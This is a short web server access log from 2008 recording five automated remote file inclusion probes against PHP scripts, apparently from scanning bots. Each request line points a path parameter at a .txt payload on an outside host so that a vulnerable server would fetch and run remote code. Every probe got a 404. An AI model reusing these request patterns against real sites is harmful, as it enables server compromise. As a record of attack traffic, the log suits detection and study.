75.0.18.81 - - [31/Jul/2008:05:25:21 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.kke.com/id.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
75.0.18.81 - - [31/Jul/2008:05:25:21 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.kke.com/id.txt? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
89.111.172.23 - - [31/Jul/2008:05:25:45 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.steelselect.com/resource_library/bajo.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
89.111.172.23 - - [31/Jul/2008:05:25:46 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.steelselect.com/resource_library/bajo.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
90.3.115.62 - - [31/Jul/2008:05:27:12 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
